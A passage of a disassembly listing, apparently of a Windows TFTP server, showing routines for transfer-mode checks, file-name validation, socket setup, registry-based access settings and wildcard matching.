		mov	edi, [ebp+var_4]
		mov	eax, offset aOctet ; "octet"


loc_1003008:				; CODE XREF: sub_1002F31+F3j
		mov	dl, [edi]
		mov	cl, dl
		cmp	dl, [eax]
		jnz	short loc_100302A
		test	cl, cl
		jz	short loc_1003026
		mov	dl, [edi+1]
		mov	cl, dl
		cmp	dl, [eax+1]
		jnz	short loc_100302A
		inc	edi
		inc	edi
		inc	eax
		inc	eax
		test	cl, cl
		jnz	short loc_1003008


loc_1003026:				; CODE XREF: sub_1002F31+E1j
		xor	eax, eax
		jmp	short loc_100302F
; ---------------------------------------------------------------------------


loc_100302A:				; CODE XREF: sub_1002F31+DDj
					; sub_1002F31+EBj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh


loc_100302F:				; CODE XREF: sub_1002F31+F7j
		test	eax, eax
		jnz	loc_10032F6


loc_1003037:				; CODE XREF: sub_1002F31+CDj
		mov	edi, [ebp+var_18]
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		lea	edx, [esi+1FFADh]
		repne scasb
		not	ecx
		sub	edi, ecx
		push	edx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, edx
		mov	[ebp+var_4], edx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		call	sub_100261E
		test	eax, eax
		jnz	short loc_1003071
		push	offset aMalformedFileN ; "Malformed file name"
		jmp	short loc_10030CB
; ---------------------------------------------------------------------------


loc_1003071:				; CODE XREF: sub_1002F31+137j
		push	[ebp+var_8]
		push	offset dword_1005CE8
		call	sub_10039D6
		test	eax, eax
		jnz	short loc_1003093
		push	[ebp+var_8]
		push	offset dword_1005D20
		call	sub_10039D6
		test	eax, eax
		jz	short loc_10030A4


loc_1003093:				; CODE XREF: sub_1002F31+14Fj
		push	[ebp+var_4]
		push	offset dword_1005D58
		call	sub_10039D6
		test	eax, eax
		jnz	short loc_10030B0


loc_10030A4:				; CODE XREF: sub_1002F31+160j
		call	ds:dword_10010AC
		push	0
		push	2
		jmp	short loc_1003100
; ---------------------------------------------------------------------------


loc_10030B0:				; CODE XREF: sub_1002F31+171j
		push	(offset	dword_1005E07+1)
		push	0FFBCh
		push	[ebp+var_4]
		call	sub_100273D
		test	eax, eax
		jnz	short loc_10030CF
		push	offset aFileNameTooLon ; "File name too	long"


loc_10030CB:				; CODE XREF: sub_1002F31+13Ej
		push	0
		jmp	short loc_1003100
; ---------------------------------------------------------------------------


loc_10030CF:				; CODE XREF: sub_1002F31+193j
		push	8000h
		push	[ebp+var_4]
		call	ds:dword_10010E4
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		mov	[ebx+1002Ch], eax
		jnz	short loc_1003116
		mov	esi, ds:dword_10010AC
		call	esi ; dword_10010AC
		push	dword ptr [eax]
		call	ds:dword_100102C
		call	esi ; dword_10010AC
		push	0
		push	1


loc_1003100:				; CODE XREF: sub_1002F31+17Dj
					; sub_1002F31+19Cj
		mov	eax, [ebp+arg_0]
		push	dword ptr [eax+8]
		lea	ecx, [eax+0FFF1h]
		add	eax, 0Ch
		push	ecx
		push	eax
		jmp	loc_1003308
; ---------------------------------------------------------------------------


loc_1003116:				; CODE XREF: sub_1002F31+1B7j
		mov	edi, ds:dword_1001088
		push	2
		push	0
		push	eax
		call	edi ; dword_1001088
		mov	esi, [ebp+arg_0]
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	short loc_1003140
		push	0
		push	0
		mov	[esi+24h], eax
		push	dword ptr [ebx+1002Ch]
		call	edi ; dword_1001088
		add	esp, 0Ch


loc_1003140:				; CODE XREF: sub_1002F31+1FBj
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_1003159
		mov	edi, ds:dword_10010AC
		call	edi ; dword_10010AC
		call	edi ; dword_10010AC
		push	dword ptr [eax]
		call	ds:dword_100102C
		jmp	short loc_1003197
; ---------------------------------------------------------------------------


loc_1003159:				; CODE XREF: sub_1002F31+212j
		push	0
		push	2
		push	2
		call	ds:dword_100112C
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		mov	[ebp+var_4], edi
		jz	short loc_1003191
		mov	eax, [esi+1Ch]
		and	[ebp+var_26], 0
		mov	[ebp+var_24], eax
		lea	eax, [ebp+var_28]
		push	10h
		push	eax
		push	edi
		mov	[ebp+var_28], 2
		call	ds:dword_1001124
		test	eax, eax
		jz	short loc_10031A3


loc_1003191:				; CODE XREF: sub_1002F31+23Cj
		call	ds:dword_10010F8


loc_1003197:				; CODE XREF: sub_1002F31+226j
		push	offset aInsufficientRe ; "Insufficient resources"
		push	0
		jmp	loc_10032FA
; ---------------------------------------------------------------------------


loc_10031A3:				; CODE XREF: sub_1002F31+25Ej
		push	ebx
		mov	[esi+8], edi
		call	ds:dword_1001044
		mov	[ebx+20h], edi
		add	esi, 0Ch
		lea	edi, [ebx+28h]
		mov	[ebp+var_8], esi
		movsd
		movsd
		movsd
		movsd
		xor	edi, edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	ds:dword_1001040
		cmp	eax, edi
		mov	[ebx+0FFF8h], eax
		jz	short loc_10031E8
		push	2
		push	eax
		push	[ebp+var_4]
		call	sub_100188E
		cmp	eax, edi
		mov	[ebx+0FFFCh], eax
		jnz	short loc_10031F3


loc_10031E8:				; CODE XREF: sub_1002F31+2A0j
		call	ds:dword_1001038
		jmp	loc_1003312
; ---------------------------------------------------------------------------


loc_10031F3:				; CODE XREF: sub_1002F31+2B5j
		add	ebx, 18h
		push	ebx
		call	sub_100287F
		push	1
		pop	esi
		push	[ebp+var_4]
		mov	[ebp+var_14], esi
		call	sub_10028B5
		mov	ebx, eax
		cmp	ebx, edi
		jz	loc_1003312
		lea	edi, [ebx+10028h]
		lea	eax, [ebx+38h]
		push	edi
		push	eax
		lea	eax, [ebx+10024h]
		mov	[ebp+var_10], esi
		push	eax
		mov	eax, [ebp+var_C]
		push	esi
		mov	esi, [ebp+arg_0]
		inc	eax
		push	eax
		push	esi
		call	sub_10023D8
		test	eax, eax
		jnz	loc_1003312
		cmp	[edi], eax
		jz	short loc_1003255
		mov	eax, [esi+28h]
		imul	eax, 3E8h
		mov	[ebx+10000h], eax
		jmp	short loc_100325F
; ---------------------------------------------------------------------------


loc_1003255:				; CODE XREF: sub_1002F31+311j
		mov	dword ptr [ebx+10000h],	3E8h


loc_100325F:				; CODE XREF: sub_1002F31+322j
		mov	eax, [ebx+10000h]
		push	0
		push	eax
		push	eax
		push	dword ptr [ebx+20h]
		lea	eax, [ebx+10004h]
		push	offset sub_1002A3D
		push	eax
		push	dword_10060A0
		call	ds:dword_1001178
		push	1
		pop	edi
		mov	[ebx+24h], edi
		mov	eax, [esi+20h]
		push	esi
		push	ebx
		mov	[ebx+10018h], eax
		mov	[ebx+10014h], di
		call	sub_10027E1
		push	10h
		xor	ecx, ecx
		push	[ebp+var_8]
		cmp	eax, ecx
		mov	[ebx+1000Ch], ecx
		push	ecx
		push	dword ptr [ebx+10020h]
		jz	short loc_10032D9
		lea	eax, [ebx+38h]
		push	eax
		push	[ebp+var_4]
		call	ds:dword_1001130
		mov	ecx, [ebx+1001Ch]
		cmp	ecx, [esi+20h]
		jnb	short loc_10032E9
		mov	[ebx+10030h], edi
		jmp	short loc_10032E9
; ---------------------------------------------------------------------------


loc_10032D9:				; CODE XREF: sub_1002F31+386j
		add	esi, 0FFF1h
		push	esi
		push	[ebp+var_4]
		call	ds:dword_1001130


loc_10032E9:				; CODE XREF: sub_1002F31+39Ej
					; sub_1002F31+3A6j
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_1003312
		call	ds:dword_10010F8
		jmp	short loc_1003312
; ---------------------------------------------------------------------------


loc_10032F6:				; CODE XREF: sub_1002F31+100j
		push	0
		push	4


loc_10032FA:				; CODE XREF: sub_1002F31+26Dj
		push	dword ptr [esi+8]
		lea	eax, [esi+0FFF1h]
		add	esi, 0Ch
		push	eax
		push	esi


loc_1003308:				; CODE XREF: sub_1002F31+1E0j
		call	sub_100230A
		jmp	short loc_1003312
; ---------------------------------------------------------------------------


loc_100330F:				; CODE XREF: sub_1002F31+27j
		mov	ebx, [ebp+arg_0]


loc_1003312:				; CODE XREF: sub_1002F31+2BDj
					; sub_1002F31+2DDj ...
		test	ebx, ebx
		jz	short loc_1003331
		cmp	[ebp+var_10], 0
		jz	short loc_1003323
		push	ebx
		call	ds:dword_100104C


loc_1003323:				; CODE XREF: sub_1002F31+3E9j
		cmp	[ebp+var_14], 0
		jnz	short loc_1003331
		push	ebx
		call	ds:dword_10010A0
		pop	ecx


loc_1003331:				; CODE XREF: sub_1002F31+50j
					; sub_1002F31+3E3j ...
		pop	edi
		pop	esi
		xor	eax, eax
		pop	ebx
		leave
		retn	4
sub_1002F31	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_100333A	proc near		; DATA XREF: sub_1001A91+20Fo

var_28		= word ptr -28h
var_26		= word ptr -26h
var_24		= dword	ptr -24h
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		and	[ebp+var_10], 0
		and	[ebp+var_14], 0
		push	ebx
		push	esi
		push	edi
		push	10034h
		call	ds:dword_1001094
		mov	ebx, eax
		pop	ecx
		test	ebx, ebx
		jz	loc_1003731
		mov	ecx, 400Dh
		xor	eax, eax
		mov	edi, ebx
		push	0FFBAh
		rep stosd
		mov	eax, [ebp+arg_0]
		lea	esi, [eax+36h]
		push	esi
		mov	[ebp+var_4], esi
		call	sub_1002F0E
		test	eax, eax
		jz	loc_1003712
		mov	edi, esi
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		repne scasb
		mov	edi, [ebp+arg_0]
		not	ecx
		push	dword ptr [edi+10h]
		dec	ecx
		lea	esi, [ecx+esi+1]
		call	ds:dword_1001120
		mov	[ebp+var_18], eax
		mov	ax, [edi+0Eh]
		push	eax
		call	ds:dword_1001104
		cmp	byte ptr [esi],	0
		mov	edi, esi
		mov	[ebp+var_C], edi
		jz	short loc_10033E1


loc_10033BC:				; CODE XREF: sub_100333A+A2j
		movsx	eax, byte ptr [edi]
		push	eax
		call	ds:dword_100114C
		test	eax, eax
		movsx	eax, byte ptr [edi]
		pop	ecx
		jz	short loc_10033D6
		push	eax
		call	ds:dword_1001150
		pop	ecx


loc_10033D6:				; CODE XREF: sub_100333A+92j
		mov	[edi], al
		inc	edi
		cmp	byte ptr [edi],	0
		jnz	short loc_10033BC
		mov	[ebp+var_C], edi


loc_10033E1:				; CODE XREF: sub_100333A+80j
		mov	eax, offset aNetascii ;	"netascii"
		mov	edi, esi


loc_10033E8:				; CODE XREF: sub_100333A+CAj
		mov	dl, [edi]
		mov	cl, dl
		cmp	dl, [eax]
		jnz	short loc_100340A
		test	cl, cl
		jz	short loc_1003406
		mov	dl, [edi+1]
		mov	cl, dl
		cmp	dl, [eax+1]
		jnz	short loc_100340A
		inc	edi
		inc	edi
		inc	eax
		inc	eax
		test	cl, cl
		jnz	short loc_10033E8


loc_1003406:				; CODE XREF: sub_100333A+B8j
		xor	eax, eax
		jmp	short loc_100340F
; ---------------------------------------------------------------------------


loc_100340A:				; CODE XREF: sub_100333A+B4j
					; sub_100333A+C2j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh


loc_100340F:				; CODE XREF: sub_100333A+CEj
		test	eax, eax
		jnz	short loc_100341F
		mov	dword ptr [ebx+10030h],	4000h
		jmp	short loc_100345D
; ---------------------------------------------------------------------------


loc_100341F:				; CODE XREF: sub_100333A+D7j
		mov	edi, offset aOctet ; "octet"


loc_1003424:				; CODE XREF: sub_100333A+106j
		mov	cl, [esi]
		mov	al, cl
		cmp	cl, [edi]
		jnz	short loc_1003446
		test	al, al
		jz	short loc_1003442
		mov	cl, [esi+1]
		mov	al, cl
		cmp	cl, [edi+1]
		jnz	short loc_1003446
		inc	esi
		inc	esi
		inc	edi
		inc	edi
		test	al, al
		jnz	short loc_1003424


loc_1003442:				; CODE XREF: sub_100333A+F4j
		xor	eax, eax
		jmp	short loc_100344B
; ---------------------------------------------------------------------------


loc_1003446:				; CODE XREF: sub_100333A+F0j
					; sub_100333A+FEj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh


loc_100344B:				; CODE XREF: sub_100333A+10Aj
		test	eax, eax
		jnz	loc_10036F8
		mov	dword ptr [ebx+10030h],	8000h


loc_100345D:				; CODE XREF: sub_100333A+E3j
		mov	eax, [ebp+arg_0]
		mov	edi, [ebp+var_4]
		or	ecx, 0FFFFFFFFh
		lea	edx, [eax+1FFADh]
		xor	eax, eax
		repne scasb
		not	ecx
		sub	edi, ecx
		push	edx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, edx
		mov	[ebp+var_8], edx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		call	sub_100261E
		test	eax, eax
		jnz	short loc_100349A
		push	offset aMalformedFileN ; "Malformed file name"
		jmp	short loc_10034DF
; ---------------------------------------------------------------------------


loc_100349A:				; CODE XREF: sub_100333A+157j
		push	[ebp+var_18]
		push	offset dword_1005D20
		call	sub_10039D6
		test	eax, eax
		jz	loc_10036EC
		push	[ebp+var_4]
		push	offset dword_1005D90
		call	sub_10039D6
		test	eax, eax
		jz	loc_10036EC
		push	(offset	dword_1005E07+1)
		push	0FFBCh
		push	[ebp+var_8]
		call	sub_100273D
		test	eax, eax
		jnz	short loc_10034E6
		push	offset aFileNameTooLon ; "File name too	long"


loc_10034DF:				; CODE XREF: sub_100333A+15Ej
		push	0
		jmp	loc_10036FC
; ---------------------------------------------------------------------------


loc_10034E6:				; CODE XREF: sub_100333A+19Ej
		push	180h
		push	8302h
		push	[ebp+var_8]
		call	ds:dword_10010E4
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		mov	[ebx+1002Ch], eax
		jnz	short loc_100351E
		mov	esi, ds:dword_10010AC
		call	esi ; dword_10010AC
		call	esi ; dword_10010AC
		push	dword ptr [eax]
		call	ds:dword_100102C
		jmp	loc_10036F2
; ---------------------------------------------------------------------------


loc_100351E:				; CODE XREF: sub_100333A+1CBj
		xor	esi, esi
		push	esi
		push	2
		push	2
		call	ds:dword_100112C
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		mov	[ebp+var_4], edi
		jnz	short loc_1003546
		call	ds:dword_10010F8
		push	offset aInsufficientRe ; "Insufficient resources"
		push	esi
		jmp	loc_10036FC
; ---------------------------------------------------------------------------


loc_1003546:				; CODE XREF: sub_100333A+1F9j
		mov	[ebp+var_26], si
		mov	esi, [ebp+arg_0]
		push	10h
		mov	[ebp+var_28], 2
		mov	eax, [esi+1Ch]
		mov	[ebp+var_24], eax
		lea	eax, [ebp+var_28]
		push	eax
		push	edi
		call	ds:dword_1001124
		test	eax, eax
		jz	short loc_100358A
		call	ds:dword_10010F8
		push	offset aInsufficientRe ; "Insufficient resources"
		push	0
		push	dword ptr [esi+8]
		lea	eax, [esi+0FFF1h]
		add	esi, 0Ch
		push	eax
		push	esi
		jmp	loc_100370D
; ---------------------------------------------------------------------------


loc_100358A:				; CODE XREF: sub_100333A+22Ej
		lea	eax, [ebx+10028h]
		mov	[esi+8], edi
		push	eax
		lea	eax, [ebx+38h]
		push	eax
		lea	eax, [ebx+10024h]
		push	eax
		mov	eax, [ebp+var_C]
		inc	eax
		push	2
		push	eax
		push	esi
		call	sub_10023D8
		test	eax, eax
		jnz	loc_1003712
		push	ebx
		call	ds:dword_1001044
		mov	[ebx+20h], edi
		add	esi, 0Ch
		lea	edi, [ebx+28h]
		mov	[ebp+var_18], esi
		movsd
		movsd
		movsd
		movsd
		xor	esi, esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	ds:dword_1001040
		cmp	eax, esi
		mov	[ebx+0FFF8h], eax
		jz	short loc_10035F8
		push	2
		pop	edi
		push	edi
		push	eax
		push	[ebp+var_4]
		call	sub_100188E
		cmp	eax, esi
		mov	[ebx+0FFFCh], eax
		jnz	short loc_1003603


loc_10035F8:				; CODE XREF: sub_100333A+2A5j
		call	ds:dword_1001038
		jmp	loc_1003712
; ---------------------------------------------------------------------------


loc_1003603:				; CODE XREF: sub_100333A+2BCj
		add	ebx, 18h
		push	ebx
		call	sub_100287F
		push	[ebp+var_4]
		mov	[ebp+var_14], 1
		call	sub_10028B5
		mov	ebx, eax
		cmp	ebx, esi
		jz	loc_1003712
		xor	esi, esi
		mov	[ebp+var_10], 1
		cmp	[ebx+10028h], esi
		jz	short loc_100364A
		mov	eax, [ebp+arg_0]
		mov	eax, [eax+28h]
		imul	eax, 3E8h
		mov	[ebx+10000h], eax
		jmp	short loc_1003654
; ---------------------------------------------------------------------------


loc_100364A:				; CODE XREF: sub_100333A+2FAj
		mov	dword ptr [ebx+10000h],	3E8h


loc_1003654:				; CODE XREF: sub_100333A+30Ej
		mov	eax, [ebx+10000h]
		push	esi
		push	eax
		push	eax
		push	dword ptr [ebx+20h]
		lea	eax, [ebx+10004h]
		push	offset sub_1002A3D
		push	eax
		push	dword_10060A0
		call	ds:dword_1001178
		mov	eax, [ebp+arg_0]
		mov	ecx, [ebx+10024h]
		mov	[ebx+24h], edi
		cmp	ecx, esi
		mov	eax, [eax+20h]
		mov	[ebx+10018h], eax
		lea	eax, [ebx+10024h]
		jz	short loc_10036A1
		mov	[ebx+10020h], ecx
		mov	[eax], esi
		jmp	short loc_10036C5
; ---------------------------------------------------------------------------


loc_10036A1:				; CODE XREF: sub_100333A+35Bj
		mov	esi, ds:dword_1001104
		push	4
		pop	edi
		push	edi
		call	esi ; dword_1001104
		mov	[ebx+38h], ax
		mov	ax, [ebx+10014h]
		push	eax
		call	esi ; dword_1001104
		mov	[ebx+3Ah], ax
		mov	[ebx+10020h], edi


loc_10036C5:				; CODE XREF: sub_100333A+365j
		push	10h
		lea	eax, [ebx+38h]
		push	[ebp+var_18]
		push	0
		push	dword ptr [ebx+10020h]
		push	eax
		push	[ebp+var_4]
		call	ds:dword_1001130
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_1003712
		call	ds:dword_10010F8
		jmp	short loc_1003712
; ---------------------------------------------------------------------------


loc_10036EC:				; CODE XREF: sub_100333A+16Fj
					; sub_100333A+184j
		call	ds:dword_10010AC


loc_10036F2:				; CODE XREF: sub_100333A+1DFj
		push	0
		push	2
		jmp	short loc_10036FC
; ---------------------------------------------------------------------------


loc_10036F8:				; CODE XREF: sub_100333A+113j
		push	0
		push	4


loc_10036FC:				; CODE XREF: sub_100333A+1A7j
					; sub_100333A+207j ...
		mov	eax, [ebp+arg_0]
		push	dword ptr [eax+8]
		lea	ecx, [eax+0FFF1h]
		add	eax, 0Ch
		push	ecx
		push	eax


loc_100370D:				; CODE XREF: sub_100333A+24Bj
		call	sub_100230A


loc_1003712:				; CODE XREF: sub_100333A+48j
					; sub_100333A+274j ...
		test	ebx, ebx
		jz	short loc_1003731
		cmp	[ebp+var_10], 0
		jz	short loc_1003723
		push	ebx
		call	ds:dword_100104C


loc_1003723:				; CODE XREF: sub_100333A+3E0j
		cmp	[ebp+var_14], 0
		jnz	short loc_1003731
		push	ebx
		call	ds:dword_10010A0
		pop	ecx


loc_1003731:				; CODE XREF: sub_100333A+21j
					; sub_100333A+3DAj ...
		pop	edi
		pop	esi
		xor	eax, eax
		pop	ebx
		leave
		retn	4
sub_100333A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_100373A	proc near		; CODE XREF: sub_1002CE6+D7p

var_1FF70	= byte ptr -1FF70h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		mov	eax, 1FF70h
		call	sub_1003A3E
		cmp	[ebp+arg_C], 8000h
		push	esi
		push	edi
		jnz	short loc_100375A
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		jmp	short loc_1003792
; ---------------------------------------------------------------------------


loc_100375A:				; CODE XREF: sub_100373A+16j
		mov	edx, [ebp+arg_4]
		xor	ecx, ecx
		xor	esi, esi
		cmp	[ebp+arg_8], ecx
		jle	short loc_1003790
		mov	edi, [ebp+arg_10]


loc_1003769:				; CODE XREF: sub_100373A+54j
		cmp	byte ptr [edi],	0Dh
		jnz	short loc_1003779
		cmp	byte ptr [ecx+edx], 0
		jnz	short loc_1003779
		and	byte ptr [edi],	0
		jmp	short loc_100378A
; ---------------------------------------------------------------------------


loc_1003779:				; CODE XREF: sub_100373A+32j
					; sub_100373A+38j
		mov	al, [ecx+edx]
		mov	[ebp+esi+var_1FF70], al
		inc	esi
		cmp	al, 0Dh
		jnz	short loc_100378A
		mov	[edi], al


loc_100378A:				; CODE XREF: sub_100373A+3Dj
					; sub_100373A+4Cj
		inc	ecx
		cmp	ecx, [ebp+arg_8]
		jl	short loc_1003769


loc_1003790:				; CODE XREF: sub_100373A+2Aj
		push	esi
		push	edx


loc_1003792:				; CODE XREF: sub_100373A+1Ej
		push	[ebp+arg_0]
		call	ds:dword_10010E8
		mov	edi, eax
		add	esp, 0Ch
		cmp	edi, 0FFFFFFFFh
		jnz	short loc_10037B7
		mov	esi, ds:dword_10010AC
		call	esi ; dword_10010AC
		call	esi ; dword_10010AC
		push	dword ptr [eax]
		call	ds:dword_100102C


loc_10037B7:				; CODE XREF: sub_100373A+69j
		mov	eax, edi
		pop	edi
		pop	esi
		leave
		retn	14h
sub_100373A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_10037BF	proc near		; CODE XREF: sub_1001665:loc_10017F3p

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		lea	eax, [ebp+var_10]
		push	ebx
		xor	ebx, ebx
		push	eax
		push	0F003Fh
		push	ebx
		push	offset aSystemCurrentc ; "System\\CurrentControlSet\\Services\\tftpd"...
		push	80000002h
		mov	[ebp+var_4], ebx
		call	ds:dword_1001000
		cmp	eax, ebx
		jz	short loc_10037F6
		call	ds:dword_1001038
		xor	eax, eax
		jmp	loc_100390D
; ---------------------------------------------------------------------------


loc_10037F6:				; CODE XREF: sub_10037BF+28j
		cmp	byte ptr dword_1005E07+1, bl
		push	edi
		push	esi
		mov	esi, ds:dword_1001008
		jnz	short loc_100383C
		lea	eax, [ebp+var_8]
		mov	[ebp+var_8], 1F4h
		push	eax
		lea	eax, [ebp+var_C]
		push	(offset	dword_1005E07+1)
		push	eax
		push	ebx
		push	offset aDirectory ; "directory"
		push	[ebp+var_10]
		call	esi ; dword_1001008
		cmp	eax, ebx
		jz	short loc_1003831
		call	ds:dword_1001038
		jmp	short loc_100383C
; ---------------------------------------------------------------------------


loc_1003831:				; CODE XREF: sub_10037BF+68j
		push	1
		pop	eax
		cmp	[ebp+var_C], eax
		jnz	short loc_100383C
		mov	[ebp+var_4], eax


loc_100383C:				; CODE XREF: sub_10037BF+45j
					; sub_10037BF+70j ...
		push	32h
		lea	eax, [ebp+var_8]
		pop	edi
		push	eax
		lea	eax, [ebp+var_C]
		push	offset dword_1005CE8
		push	eax
		push	ebx
		push	offset aClients	; "clients"
		push	[ebp+var_10]
		mov	[ebp+var_8], edi
		call	esi ; dword_1001008
		cmp	eax, ebx
		jz	short loc_1003866
		call	ds:dword_1001038
		jmp	short loc_100386F
; ---------------------------------------------------------------------------


loc_1003866:				; CODE XREF: sub_10037BF+9Dj
		cmp	[ebp+var_C], 1
		jnz	short loc_100386F
		inc	[ebp+var_4]


loc_100386F:				; CODE XREF: sub_10037BF+A5j
					; sub_10037BF+ABj
		lea	eax, [ebp+var_8]
		mov	[ebp+var_8], edi
		push	eax
		lea	eax, [ebp+var_C]
		push	offset dword_1005D20
		push	eax
		push	ebx
		push	offset aMasters	; "masters"
		push	[ebp+var_10]
		call	esi ; dword_1001008
		cmp	eax, ebx
		jz	short loc_1003896
		call	ds:dword_1001038
		jmp	short loc_100389F
; ---------------------------------------------------------------------------


loc_1003896:				; CODE XREF: sub_10037BF+CDj
		cmp	[ebp+var_C], 1
		jnz	short loc_100389F
		inc	[ebp+var_4]


loc_100389F:				; CODE XREF: sub_10037BF+D5j
					; sub_10037BF+DBj
		lea	eax, [ebp+var_8]
		mov	[ebp+var_8], edi
		push	eax
		lea	eax, [ebp+var_C]
		push	offset dword_1005D58
		push	eax
		push	ebx
		push	offset aReadable ; "readable"
		push	[ebp+var_10]
		call	esi ; dword_1001008
		cmp	eax, ebx
		jz	short loc_10038C6
		call	ds:dword_1001038
		jmp	short loc_10038CF
; ---------------------------------------------------------------------------


loc_10038C6:				; CODE XREF: sub_10037BF+FDj
		cmp	[ebp+var_C], 1
		jnz	short loc_10038CF
		inc	[ebp+var_4]


loc_10038CF:				; CODE XREF: sub_10037BF+105j
					; sub_10037BF+10Bj
		lea	eax, [ebp+var_8]
		mov	[ebp+var_8], edi
		push	eax
		lea	eax, [ebp+var_C]
		push	offset dword_1005D90
		push	eax
		push	ebx
		push	offset aWritable ; "writable"
		push	[ebp+var_10]
		call	esi ; dword_1001008
		cmp	eax, ebx
		jz	short loc_10038F6
		call	ds:dword_1001038
		jmp	short loc_10038FF
; ---------------------------------------------------------------------------


loc_10038F6:				; CODE XREF: sub_10037BF+12Dj
		cmp	[ebp+var_C], 1
		jnz	short loc_10038FF
		inc	[ebp+var_4]


loc_10038FF:				; CODE XREF: sub_10037BF+135j
					; sub_10037BF+13Bj
		push	[ebp+var_10]
		call	ds:dword_100100C
		mov	eax, [ebp+var_4]
		pop	esi
		pop	edi


loc_100390D:				; CODE XREF: sub_10037BF+32j
		pop	ebx
		leave
		retn
sub_10037BF	endp


; =============== S U B	R O U T	I N E =======================================



sub_1003910	proc near		; CODE XREF: sub_1001665+193p

var_1F4		= byte ptr -1F4h

		sub	esp, 1F4h
		cmp	byte ptr dword_1005E07+1, 0
		push	ebx
		push	ebp
		push	esi
		push	edi
		mov	ebp, 1F4h
		mov	ebx, (offset dword_1005E07+1)
		jnz	short loc_100393D
		push	ebp
		push	offset aTftpdroot ; "\\tftpdroot\\"
		push	ebx
		call	ds:dword_1001148
		add	esp, 0Ch


loc_100393D:				; CODE XREF: sub_1003910+1Bj
		lea	eax, [esp+204h+var_1F4]
		push	ebp
		push	eax
		push	ebx
		call	ds:dword_1001020
		test	eax, eax
		jnz	short loc_1003952
		push	57h
		jmp	short loc_10039CA
; ---------------------------------------------------------------------------


loc_1003952:				; CODE XREF: sub_1003910+3Cj
		mov	ecx, eax
		lea	esi, [esp+204h+var_1F4]
		mov	edi, ebx
		or	edx, 0FFFFFFFFh
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		xor	eax, eax
		and	ecx, 3
		rep movsb
		mov	edi, ebx
		mov	ecx, edx
		repne scasb
		not	ecx
		dec	ecx
		cmp	byte ptr dword_1005E07[ecx], 2Fh
		lea	eax, dword_1005E07[ecx]
		jnz	short loc_1003986
		mov	byte ptr [eax],	5Ch


loc_1003986:				; CODE XREF: sub_1003910+71j
		cmp	byte ptr [eax],	5Ch
		jz	short loc_10039B7
		cmp	ecx, ebp
		jnb	short loc_10039B7
		mov	edi, offset asc_100155C	; "\\"
		mov	ecx, edx
		xor	eax, eax
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	esi, edi
		mov	ebp, ecx
		mov	edi, ebx
		mov	ecx, edx
		repne scasb
		mov	ecx, ebp
		dec	edi
		shr	ecx, 2
		rep movsd
		mov	ecx, ebp
		and	ecx, 3
		rep movsb


loc_10039B7:				; CODE XREF: sub_1003910+79j
					; sub_1003910+7Dj
		mov	edi, ebx
		mov	ecx, edx
		xor	eax, eax
		push	1
		repne scasb
		not	ecx
		dec	ecx
		mov	dword_1005FFC, ecx


loc_10039CA:				; CODE XREF: sub_1003910+40j
		pop	eax
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		add	esp, 1F4h
		retn
sub_1003910	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_10039D6	proc near		; CODE XREF: sub_1002F31+148p
					; sub_1002F31+159p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		mov	al, [esi]
		test	al, al
		jz	short loc_1003A2E
		cmp	al, 2Ah
		jz	short loc_1003A04
		cmp	al, 3Fh
		jz	short loc_10039F7
		mov	ecx, [ebp+arg_4]
		cmp	al, [ecx]
		jnz	short loc_1003A25
		inc	ecx
		push	ecx
		jmp	short loc_1003A01
; ---------------------------------------------------------------------------


loc_10039F7:				; CODE XREF: sub_10039D6+14j
		mov	eax, [ebp+arg_4]
		cmp	byte ptr [eax],	0
		jz	short loc_1003A25
		inc	eax
		push	eax


loc_1003A01:				; CODE XREF: sub_10039D6+1Fj
		inc	esi
		jmp	short loc_1003A1B
; ---------------------------------------------------------------------------


loc_1003A04:				; CODE XREF: sub_10039D6+10j
		mov	edi, [ebp+arg_4]
		lea	eax, [esi+1]
		push	edi
		push	eax
		call	sub_10039D6
		test	eax, eax
		jnz	short loc_1003A29
		cmp	[edi], al
		jz	short loc_1003A25
		inc	edi
		push	edi


loc_1003A1B:				; CODE XREF: sub_10039D6+2Cj
		push	esi
		call	sub_10039D6
		test	eax, eax
		jnz	short loc_1003A29


loc_1003A25:				; CODE XREF: sub_10039D6+1Bj
					; sub_10039D6+27j ...
		xor	eax, eax
		jmp	short loc_1003A38
; ---------------------------------------------------------------------------


loc_1003A29:				; CODE XREF: sub_10039D6+3Dj
